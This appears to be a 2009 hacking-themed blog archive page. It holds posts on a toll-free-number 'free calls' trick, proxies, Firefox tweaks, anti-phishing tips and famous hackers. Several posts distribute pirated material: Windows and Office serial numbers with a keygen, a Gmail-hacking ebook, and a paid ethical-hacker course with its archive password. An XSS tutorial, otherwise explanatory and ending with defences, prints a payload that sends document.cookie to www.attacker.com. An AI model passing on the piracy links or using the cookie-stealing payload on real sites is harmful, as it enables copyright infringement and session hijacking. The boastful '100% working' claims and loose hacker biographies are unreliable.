Showing posts with label Hacking Tutorial ™. Show all posts
Showing posts with label Hacking Tutorial ™. Show all posts

Wednesday, August 26, 2009

Call Anywhere in the World From PC to Mobile For Free 100% Working Hack

0 comments
Hello Guys Today I will Give you the Full Proofed Hack to Call From PC to Mobile without paying a Penny.
And this is 100% working and tested hack.

THINGS THAT YOU NEED TO MAKE FREE CALLS:
1.A Personal Computer(PC) With Headphones
2.Yahoo Messanger
3.A client Phone Number Whom You want to call.

All the Phone call Hacks provided upto Now are not Working One's . Now I have been Personally using This Hack for more than 15 days. And its Going Well.

HOW TO MAKE FREE CALLS ?
1. Download the latest Yahoo Messanger.
http://messenger.yahoo.com/download

2. Install The Yahoo Messanger and Login Into your yahoo Account.

3. Type the Following Number +18003733411 in the Red Box Shown Below and Press Enter.

4. After Pressing Enter a small Window will open showing Connecting a Call to that number . Shown Below

5. Now Listen the Call And Wait Untill She Say "Free Calls" .
6. When she Says Free Calls Use Your Microphone and Say Free Calls (Don't forgot to unmute your microphone Voice in Volume Properties By Right Click on Volume Icon in your Task Bar and then Click on properties and then Advanced and then unclick mute button under Microphone).
7. As you say Free Calls You will be Able To make 5 minutes free call anywhere in the World.
Now Click on the Dialpad As Shown Below To dial the Number.


8. Now The Dial Pad Opens Like Below


9. Now Dial The Number In format Country code followed by friends number whom you want to call.
Example : 919457196088 where 91 is country code for India and 9457196088 is phone number.

After dialing wait 2 sec for phone call to connect . After that You can call Upto 5 minutes Unlimited.

This Was The Full Tutorial With Snapshot .

CREDITS:- Lokesh

Thursday, August 20, 2009

Top Orkut, youtube, Facebook, MySpace Proxies you Must Know

1 comments
Check these amazing and fastest proxies

Code:
http://www.tutized.com


Code:
http://www.orkutaccess.com


Code:
http://www.letsbunk.info


Code:
http://www.letsbunk.org


Code:
http://www.letsbunk.net


Code:
http://www.proxc.org


Code:
http://www.Greatmailz.org


Code:
http://www.surfpk.info


Code:
http://www.Orkutkey.info


Code:
http://www.UnblockedOrkut.info

Saturday, August 15, 2009

HACKING GMAIL 2009

1 comments
HACKING GMAIL 2009

Image

An interesting ebook on gmail.

Image

Code:
http://uploading.com/files/PD7GBU1R/Hacking_Gmail__2006__-_dimple.rar.html

OR


http://rapidshare.com/files/258160071/Hacking_Gmail__2006__-_dimple.rar

Make any song on your computer a ringtone on your iPhone..

0 comments
So after a bit of reading I've figured out a way to make your own ringtones out of any song on your computer for your iPhone.

It goes like this.

1. Add file(s) to your iTunes library.

2. Right click Get Info, then options tab.

3. Make the start time and stop time the duration of the ringtone you'd like to use (no longer than 40 seconds though). For example, if you'd like to use the first 40 seconds of a song, make the start time 0:00 and the end time 0:40. If you want to use from 1:40-2:20 then do it like that, just make sure you use whichever part of the song you want to be your ringer and also make sure it doesn't exceed 40 seconds. After you've selected which part of the song will be your ringer, click OK.

4. Right click the song, and click 'Convert Selection to AAC'.

5. Go to your desktop, and make a folder called Ringtones. Once you've done that, go back to iTunes, right click the newly created clip and click copy. Paste it in the folder you just made.

6. Rename the file from whateversongyoupicked.m4a to whateversongyoupicked.m4r (in order to see file extensions you might have to play with your settings a bit) (whateversongyoupicked is just the example, you don't need to change the name of the song, just the extension).

7. Double click the file and it will add it to the ringtones library in iTunes.

8. Sync/Resync your iPhone, and it will be added as a ringtone.

Free, easy, hackless.

Please leave thanks if it worked!

Smile
_________________

Over 3000 Serial Numbers for Vista & XP ,MS Products

0 comments
15 windows Vista serial numbers
50 MS office Serial numbers
50 Window Server serial Numbers
3000 Windows XP Serial Numbers
Genuine Maker All In One
Office 2007 KeyGen
XP genuine Registration Entries


Image
Code:
http://rapidshare.com/files/177119498/3500_.rar


consider downloading as a free user

no pass word

[TUTORIAL] How to Double Firefox Speed

0 comments
Firefox is in my opinion the best browser ever made until now. It includes:
-improved tabbed browsing
-pop up blocking
-integrated Goggle search
-enhanced privacy controls
-built-in phishing protection
-online spell checking
-lots of themes, interfaces, and extensions/addons

Mozilla Firefox officially supports:
-Microsoft Windows
-Linux
-Mac OS X

Unofficial Support:
-Free BSD
-OS/2
-Solaris
-SkyOS
-BeOS
-XP Professional x64 Edition

Now here are some Tips&Tricks that can help you double the speed of Firefox.

NOT FOR FIREFOX 3 Mr. Green

1. Type about:config in the address bar and then press Enter.

2. In the filter search bar type network.http.pipelining. Be sure the value field is set true,if not double-click to set true. HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.

3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.

4. In the filter search bar and type network.http.proxy.pipelining. Once opened doubleclick on it and set it to true.

5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.

6. CONTENT INTERRUPT PARSING
This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
B. When prompted to choose the value for the new boolean, select true and click OK.

7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
B. You will be prompted to enter a value. Enter 2250000 and click OK.

8. CONTENT NOTIFY INTERVAL
This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Type content.notify.interval in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.

9. CONTENT NOTIFY ONTIMER
A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
C. You will be prompted to choose the value for the new boolean. Select true and click OK.

10. Notify Backoffcount
This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 5 and click OK.

11. CONTENT SWITCH THRESHOLD
You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.
The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.

12. NGLAYOUT INITIALPAINT DELAY
Mozilla applications render web pages incrementally, they display what’s been received
of a page before the entire page has been downloaded. Since the start of a web page
normally doesn’t have much useful information to display, Mozilla applications will wait
a short interval before first rendering a page. This preference controls that interval. Rightclick (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 0 and click OK.
_________________

[Tutorial] Rip your entire iPod to your PC

0 comments
Image

If you have lost the original files that have already been synced to your iPod it seems there is no way of getting them back. However this tutorial will give you a step by step guide on how to rip the files from your iPod, back to your PC with no loss of data. Music, Movies, Podcasts, Photos, Notes, the LOT can be recovered and all iPods are supported Wink

You will need:

* An iPod - All iPods are compatible, even the iTouch and iPhone
* A Computer
* 5 - 15 minutes of your time - this depends on how much content you have on your iPod and how quickly your PC can copy it Wink
* iPod Access
* iTunes - (Optional)

iPod Access

(Mac 5.12mb) :

Code:
http://rapidshare.com/files/92470953/Ipod_Access_v4.2.2_by_Kikko_R.zip


(Windows 3.01mb) :

Code:
http://rapidshare.com/files/51076786/iPodAcces.rar


Code:
http://www.megaupload.com/?d=LRNQFIF7


Step 1

Close iTunes and once you have installed it, open iPod Access. If your iPod is not already in "Manual Mode" the program will prompt you to do so as it is neccessary when ripping your iPod:

Image

Step 2

Leave iPod Access to "Read" your iPod - iPod Access is basically scanning through your iPod finding your files.

Image

Step 3

You will now notice that iPod Access has found all my music:

Image

Step 4

If you scroll through your files you will notice that iPod Access has also recovered your Podcasts and Videos Wink

Image

Image

Step 5

Now lets transfer all your data back to your PC. First click "Backup."

Image

Step 6

Choose a directory to copy your files into (I suggest making a new folder) and click "Ok."

Image

Step 7

Leave iPod Access to copy your files to your hard drive. This may take some time depending on the amount of songs and videos you have.

Image

... A short while later the process will finish and iPod Access will return to the default screen.

Step 8

Make sure the copy was successful by right clicking the folder where you ripped the files to and selecting "Properties"

Image

Notice that all the files have been transferred Very Happy

Step 9

Open up iTunes and click "File" then "Add folder to Library" :

Image

Locate the location where you ripped your music to and let iTunes index all of your files and you're ready to go!

Certified Ethical Hacker (cbt nuggets)

0 comments
Image

Price shown based on single-user viewer license
For information on multi-user versions or
product licensing, click here.
Certified Ethical Hacker Series
Contains training for the EC-Council Certified Ethical Hacker exam 312-50
$799.00 - Includes 21 Videos

Trainer: James I. Conrad (Trainer Comments)
Running Time: 11 Hours

Ethical Hacker Certification Information [eccouncil.org]

Exam update: This series maps to the CEHv5 version of the Certified Ethical Hacker exam objectives. This exam will continue to be available through June 3rd, 2009, and if you are studying for this exam, this training will continue to be an invaluable resource.

EC-Council has released new, CEHv6 objectives for Certified Ethical Hacker certification. A new exam based on these objectives will launch November 5th, 2008. Watch the CBT Nuggets videos in development page for updates on upcoming CBT Nuggets training for this exam.

You're up late, banging away at your keyboard. You find the hole you were looking for. Now you just find the right directory, copy a couple files, back right out of the system, and erase your tracks. Within 15 minutes of finding a back door into the network, you've downloaded transaction data for all credit card transactions within the last two years. You'd think credit card processing companies would be more secure than that.

The FBI should be busting down your door any minute now. But they won't. You print out your keystroke logger info. You make a phone call. "I got in." They don't believe it. But when you deliver the keystroke log the next day, they're floored. They cut you a check, and offer you an even bigger contract to help them fix the hole.

Do things that should get you arrested - but get paid instead. Ethical Hacking is so cool.

"What makes this knowledge so valuable?"

The work you do as an Ethical Hacker can save businesses from massive harm. You get to find and close off vulnerabilities that hackers could otherwise exploit to get inside your network and steal or even destroy data. By getting there first, you prevent leaks of sensitive information - even fraud and identity theft against employees and customers.

Businesses recognize the value of security pros that are able to shut down "back-doors" into their network. Protecting their sensitive data protects their livelihood. Because the work you do as an Ethical Hacker can prevent significant harm to their business, companies will pay you top dollar to do some of the most interesting work in information security.

"What will Ethical Hacker training teach me?"

In this series you'll learn the 5 Steps of a Hack. You'll also learn legal considerations for working as an Ethical Hacker. You'll learn all about passive intelligence gathering, and get suggestions for gathering critical information through social engineering.

Other things covered in the Certified Ethical Hacker Series include TCP exploits, ICMP exploits, and other network reconnaissance techniques; pulling packets out of network communications to sniff passwords, hubs, and switches; SNMP and DNS exploits; password cracking; gaining unauthorized access to a wireless network; erasing your tracks after penetrating a network; web and file exploits too dangerous to name; and much more.

"Does this training cover the Certified Ethical Hacker exam?"

The Certified Ethical Hacker Series covers more than how to exploit your network, and how to use that knowledge to keep others from doing the same thing. It also maps to the exam objectives for CEH certification from EC-Council. It's a comprehensive resource to use for both exam prep and on-the-job reference, so you can add this valuable certification to your resume.

"Isn't this knowledge dangerous?"

From CBT Nuggets CEO Dan Charbonneau:

"I actually had a wave of fear hit me as I was half-way through reviewing this series. 'We can't sell this.' That was my gut reaction. It's too dangerous, it teaches too much, it's too powerful. My second thought was, 'We need to sell this to as many people as possible', thinking it safest if the people being attacked know exactly how to attack, and therefore how to protect."

Prerequisites

Having a basic understanding of information security and networking such as what's taught in the Security+ and Network+ series is recommended before viewing this training. More advanced security policy training such as SSCP or CISSP is strongly recommended before using this knowledge on the job.

The Certified Ethical Hacker Series contains:

- Series Intro (free video)
- Hacker Terms
- Hacker Procedures
- Using VMWare

- Using Linux
- Passive Intelligence Gathering Part 1
- Passive Intelligence Gathering Part 2
- Social Engineering
- Network Reconnaissance Part 1
- Network Reconnaissance Part 2
- Service Identification and Enumeration
- Vulnerability Assessment: Nessus & GFI Languard
- Vulnerability Assessment: Network Sniffing
- SNMP
- DNS
- Password Cracking
- Exploits Part 1: Linux
- Exploits Part 2: Windows
- Web and File Exploits
- Wireless Security
- Erasing Tracks

Notice:

By purchasing the Certified Ethical Hacker Series from CBT Nuggets, you are acknowledging understanding of and agreement with the following terms:

The information contained in the Certified Ethical Hacker Series is to be used solely for lawful purposes. You will not use the information contained in this training for illegal or malicious attacks, and you will not use such tools in an attempt to compromise any computer system. Further, you agree to indemnify both CBT Nuggets, Inc. and the certification authority EC-Council with respect to the use or misuse of this information, regardless of intent.


Code:


http://rapidshare.com/files/215231158/Killa_CEH_Tutorial.part01.rar

http://rapidshare.com/files/215234447/Killa_CEH_Tutorial.part02.rar

http://rapidshare.com/files/215237600/Killa_CEH_Tutorial.part03.rar

http://rapidshare.com/files/215240399/Killa_CEH_Tutorial.part04.rar



Password:

Code:
Exploitnation.org

Thursday, August 6, 2009

Cross Website Scripting(XSS) Info and Prevention

0 comments

Welcome to the hacking discussion blog

So here I m gonna write an article over XSS aka cross website scripting …………

Some declaration-this article is only meant for educational purpose if someone uses it for wrong purpose then HD blog is not responsible for it .

Note – since HDB will not going to show the codes so I modify then now there is some new parameter which means something else

< = {

> = }

Introduction

Cross Site Scripting aka XSS is one of the most common application level attacks that hackers use to sneak into web applications today. They are unique in that, rather than attacking a server directly, they use a vulnerable server as a vector to attack a client. This can lead to extreme difficulty in tracing attackers, especially when requests are not fully logged Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the XSS attack involves three parties – the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user. This was achieved by running malicious Javascript code at the victim (client) browser, with the “access privileges” of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result, the attacker gains the cookies and impersonates the victim.

TYPES OF XSS

LOCAL XSS

This form of XSS is rarely mentioned, because it is very hard to pull off and requires knowledge of either browser exploits or local OS html files. For the first scenario, the attacker could use their website to send malicious commands to the local users vulnerable HTML files(look in /WINDOWS, there are HTML files there) that executes some command on the users system. The second form that this attack can take is using browser exploits. Using a browser exploit, the attacker can plant an activeX script locally on the users system, which can run under local HTML priveleges(all javascripts are allowed without confirmation) and install backdoors, worms, spambots etc.

Non-persistent XSS

This type of XSS attack does no harm to the site itself, and they are created when javascript can be injected into a variable that is echoed back to the user in some way. Say when you enter some text into a search bar and press submits, and the new page that is loaded has what you searched saved in the search bar. You could escape the input tag using “} then inject script, e.g. {script}alert(”war10rd”){/script}. This is only useful in social engineering where you get a user, or administrator, to visit the page with the same parameters you provided to create the XSS, only this time with a cookie stealer script on the page. This will execute for them, logging their cookies to a site you choose

Persistent XSS

This kind of XSS is what is mostly used against guestbooks, forums and other permanent user content pages. When this type of XSS is used it stays on the page and can be used in many ways; stealing cookies, defacing a page, and spreading (the new “XSS worm” phenomenon same as the famous orkut worm)

NOW XSS ATTACK

XSS attacks are the result of flaws in server- side web applications and are rooted in user input which is not properly sanitized for HTML characters. If the attacker can insert arbitrary HTML then they could control execution of the page under permissions of the site. Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them. These links cause client side scripting languages (VBScript, JavaScript, etc.) of the attacker’s choice to execute on the victim’s browser. XSS vulnerabilities are caused by a failure in the web application to properly validate user input. The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags (much like the Badtrans worm). There are numerous ways to inject JavaScript code into URLs for the purpose of a XSS attack

Let see one example

{?php echo “Hello, {$HTTP_GET_VARS['name']}!”; ?}

Once the page is accessed, the variable sent via the GET method is placed directly on the rendered page. Since the input is not marked as variable input , the user- supplied input is interpreted exactly as its metacharacters command, very similar to SQL injection. Passing “Hacking discussion” as an argument outputs the content in correct form:

http://hdhost/hello.php?name=hacking%20discussion

now let us call site we use for XSS is called

http://www.xyz.com

At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it i.e. making sure it doesn’t contain Javascript code and/or HTML tags. Suppose, therefore, that this script is named 1.cgi, and its parameter is “name”. It can be operated this way:

GET /1.cgi?name=hacking%20discussion HTTP/1.0

Host: www.xyz.com

And the response would be:

{HTML}

{Title}1!{/Title}

Hi hacking discussion

{BR}

Welcome to our system

{/HTML}

Now explanation

Well, the attacker manages to lure the victim client into clicking a link the attacker supplies to him/her. This is a carefully and maliciously crafted link, which causes the web browser of the victim to access the site ( www.xyz.com ) and invoke the vulnerable script. The data to the script consists of a Javascript that accesses the cookies the client browser has for www.xyz.com . It is allowed, since the client browser “experiences” the Javascript coming from www.xyz.com , and Javascript’s security model allows scripts arriving from a particular site to access cookies belonging to that site.

Such a link looks like:

http://www.xyz.com/1.cgi?name={script}alert(document.cookie){/script}

The victim, upon clicking the link, will generate a request to www.xyz.com , as follows:

GET /1.cgi?name={script}alert(document.cookie){/script} HTTP/1.0

Host: www.xyz.com

And the vulnerable site response would be:

{HTML}

{Title}1!{/Title}

Hi {script}alert(document.cookie){/script}

{BR}

Welcome to our system

{/HTML}

The victim client’s browser would interpret this response as an HTML page containing a piece of

Javascript code. This code, when executed, is allowed to access all cookies belonging to

www.xyz.com, and therefore, it will pop-up a window at the client browser showing all client

cookies belonging to www.xyz.com. Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a web site (www.xyz.com), and use a script to receive the cookies. Instead of popping up a window, the attacker would write a code that accesses a URL at his/her own site (www.xyz.com), invoking the cookie reception script with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.com server. The malicious link would be:

http:// www.xyz.com /1.cgi?name={script}window.open(“http://www.attacker.com/collec

t.cgi?cookie=”%2Bdocument.cookie){/script}

And the response page would look like:

{HTML}

{Title}1!{/Title}

Hi

{script}window.open(“http://www.attacker.com/collect.cgi?cookie=”+document.cookie){

/script}

{BR}

Welcome to our system

{/HTML}

The browser, immediately upon loading this page, would execute the embedded Javascript and would send a request to the collect.cgi script in www.attacker.com, with the value of the cookies of www.xyz.com that the browser already has. This compromises the cookies of www.xyz.com that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached. It should be noted, that causing the Javascript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to a XSS attack. If Javascript’s “alert” function can be called, there’s usually no reason for the “window.open” call not to succeed. That is why most examples for XSS attacks use the alert function, which makes it very easy to detect its success.

Now Security

As a web application user, there are a few ways to protect your self from XSS attacks. The first

and most effective solution is to disable all scripting language support in your browser and email

reader. another thing is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages. Additionally, as a last resort, proxy servers can help filter out malicious scripting in HTML

Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes things stored in GET Query strings, POST data, Cookies, URLs, and in general any persistent data that are transmitted between the browser and web server. The best philosophy to follow regarding user input filtering is to deny all but a pre-selected element set of benign characters in the web input stream. This prevents developers from having to constantly predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).

Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities since application functionality is constantly changing due to upgrades, integration of third party technologies, and decentralized website authoring. Many vulnerability web application scanners are now starting to include checks for XSS, although it is unlikely that any current automated will be truly comprehensive.

By installing a third party application firewall, which intercepts CSS attacks before they reach the web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods (including path and HTTP headers) in a generic way, regardless of the script/path from the in-house application, a third party script, or a script describing no resource at all (e.g. designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and Javascript patterns, and if any match, the request is rejected and the malicious input does not arrive to the server.

References –

Cross Site Scripting Explained by Amit Klein, Sanctum Security Group

Types of xss attack by cybern00b

The Evolution of Cross-Site Scripting Attacks By David Endler

The Anatomy of Cross Site Scripting by Gavin Zuchlinski

CREDITS:- http://www.hackingdiscussion.com

Six ways to protect your gmail account from being cracked

0 comments

What is phishing?

Phishing is the best working method of hacking email accounts. The advantage of phishing in email account hacking is that victim is not able to recognize the fake page (phisher) as this phisher matches with the original page (depends on cracker’s skills).

So, here I have mentioned few tips which you should follow to prevent cracking of your email account by crackers.

1. Phishing filter:
I will recommend use of browser which has phishing filter.Web browsers like Firefox 3.0+ (my favorite), Internet Explorer 7+, Opera 7x supports phishing filter and should be used for safe browsing.

2. Do not provide sensitive information :
Yes, this is the main thing you have to remember. Unless and until, you know the person or institute, do not give your sensitive information like user ids , passwords, bank account numbers as a reply to any email. In fact, 90% emails demanding such information are meant for cracking!

3. Suspicious Filters :
Check whether there are any suspicious filters not created by you. For checking your email filters, go to Settings->Filters. If you find any such suspicious filter not created by you, delete it urgently.

4. Great offers, ads, winners :
Generally, Gmail users are deceived by emails which contain great offers, ads or declaring that you are a lucky winner and you should provide listed query information to receive your cash prize. Never click or provide any information for such claiming emails, unless you’ve actually participated in any of the said competitions, chances are that, you never had!

5. Disable Forwarding and POP/IMAP :
To disable forwarding and POP/IMAP, go to Settings-> Forwarding and POP/IMAP and disable forwarding and POP/IMAP.

6. The most important :
The most important precaution which one must follow is “do not click on the link” provided in the email without knowing to which page the link will take you. I have added my personal experience of phishing and the method to determine the link target, where i received a paypal phisher, in my article Paypal phisher to crack Paypal account. One more thing, always open link given in email by typing address of site in new tab/window.

Thus, if you will follow these guidelines, i bet your Gmail account will never be cracked by a phisher. Just remember the guidelines and prevent Gmail account from being cracked by crackers.

source: This isn’t my original article, but an aggregate information I’ve gathered in time, which will hopefully help you.


CREDITS:- http://www.hackingdiscussion.com

Monday, August 3, 2009

List Of Worlds Best hackers

0 comments
Hackers, a group that consists of skilled computer enthusiasts. A black hat is a person who compromises the security of a computer system without permission from an authorized party, typically with malicious intent. The term white hat is used for a person who is ethically opposed to the abuse of computer systems, but is frequently no less skilled. The term cracker was coined by Richard Stallman to provide an alternative to using the existing word hacker for this meaning.The somewhat similar activity of defeating copy prevention devices in software which may or may not be legal in a country's laws is actually software cracking....


List of Famous Hackers of All Time:




There are numbers of Hackers in the world till date, Few has become famous by their Black hat work and few of them are famous by their Ethical Hacking. Below is separate list of World's All Time Best Hackers and Crackers. Although I represent them by Hackers only because what every they did, was wrong but one thing is sure they were Brilliant. Hacking is not a work of simple mind, only Intelligent Mind can do that.


Gary McKinnon

Gary McKinnon, 40, accused of mounting the largest ever hack of United States government computer networks -- including Army, Air Force, Navy and NASA systems The court has recommended that McKinnon be extradited to the United States to face charges of illegally accessing 97 computers, causing US$700,000 (400,000 pounds; euro 588,000) in damage.


Jonathan James

The youth, known as "cOmrade" on the Internet, pleaded guilty to intercepting 3,300 email messages at one of the Defense Department's most sensitive operations and stealing data from 13 NASA computers, including some devoted to the new International Space Station. James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive e-mails and capture employee usernames and passwords.James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost.


Adrian Lamo

Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. In a profile article, “He Hacks by Day, Squats by Night,” Lamo reflects, “I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional.”Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.

Kevin Mitnick

The Department of Justice describes him as “the most wanted computer criminal in United States history.” His exploits were detailed in two movies: Freedom Downtime and Takedown. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation’s computer network and stealing software.Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.


Kevin Poulsen

Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio’s KIIS-FM phone lines, (taing over all of the station’s phone lines) which earned him a brand new Porsche, among other items. Law enforcement dubbed him “the Hannibal Lecter of computer crime.”Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.His hacking specialty, however, revolved around telephones. Poulsen’s most famous hack, In a related feat, Poulsen also “reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency.” Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.


Robert Tappan Morris

Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.

Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years’ probation, 400 hours of community service and a fined $10,500.Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.


Vladimir Levin


Levin accessed the accounts of several large corporate customers of Citibank via their dial-up wire transfer service (Financial Institutions Citibank Cash Manager) and transferred funds to accounts set up by accomplices in Finland, the United States, the Netherlands, Germany and Israel.In 2005 an alleged member of the former St. Petersburg hacker group, claiming to be one of the original Citibank penetrators, published under the name ArkanoiD a memorandum on popular Provider.net.ru website dedicated to telecom market.According to him, Levin was not actually a scientist (mathematician, biologist or the like) but a kind of ordinary system administrator who managed to get hands on the ready data about how to penetrate in Citibank machines and then exploit them.ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. ArkanoiD’s group in 1994 found out Citibank systems were unprotected and it spent several weeks examining the structure of the bank’s USA-based networks remotely. Members of the group played around with systems’ tools (e.g. were installing and running games) and were unnoticed by the bank’s staff. Penetrators did not plan to conduct a robbery for their personal safety and stopped their activities at some time. Someone of them later handed over the crucial access data to Levin (reportedly for the stated $100).


David Smith

David Smith, the author of the e-mail virus known as Melissa, which swamped computers around the world, spreading like a malicious chain letter. He was facing nearly 40 years in jail . About 63,000 viruses have rolled through the Internet, causing an estimated $65 billion in damage, but Smith is the only person to go to federal prison in the United States for sending one.


Mark Abene

Abene (born 1972), better known by his pseudonym Phiber Optik, is a computer security hacker from New York City. Phiber Optik was once a member of the Hacker Groups Legion of Doom and Masters of Deception. In 1994, he served a one-year prison sentence for conspiracy and unauthorized access to computer and telephone systems.

Phiber Optik was a high-profile hacker in the early 1990s, appearing in The New York Times, Harper’s, Esquire, in debates and on television. Phiber Optik is an important figure in the 1995 non-fiction book Masters of Deception — The Gang that Ruled Cyberspace


Onel A. de Guzman

el A. de Guzman, a Filipino computer student, Greatest Hacker of all time. He was creator of "Love Bug" virus that crippled computer e-mail systems worldwide.

Chen Ing-hau

He was the creator of one of the deadly virus of all time "Chernobyl computer virus " which had melted down many computers worldwide.





Mudge

"Mudge" along with fellow hackers told the committee that computer security is so lax, they could disable the entire Internet in a half-hour.



Tsutomu Shimomura

One of the world's top computer security experts. Shimomura helped Federal officials track down and arrest computer hacker Kevin Mitnickin Raleigh Feb. 15, 1995 in connection with a break-in on Shimomura's computer.





Jon Lech Johansen

Johansen, who became a hero to computer hackers and was deemed a villain by Hollywood, is on trial for writing and distributing a program called DeCSS, software which makes it possible to copy protected DVD films. Prosecutors have asked to have his computers confiscated and called for him to pay $1,400 in court costs.



Dmitry Sklyarov

Russian computer programmer who was charged with violating copyrights, Sklyarov was jailed after developing software that allows the user to circumvent the copyright protections in Adobe Systems eBook reader program.


Dennis Moran

Moran, known on the Web as "Coolio," pleaded guilty to hacking into national computer sites last year belonging to the Army, the Air Force and the anti-drug Dare.com.








Famous Three Master Hackers




Some Grand Famous Hackers of Life Time:

Richard Stallman

He was the founder of GNU Projects. Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.


Linus Torvalds

Father of Linux is a good hacker of all time.












Stephen Wozniak

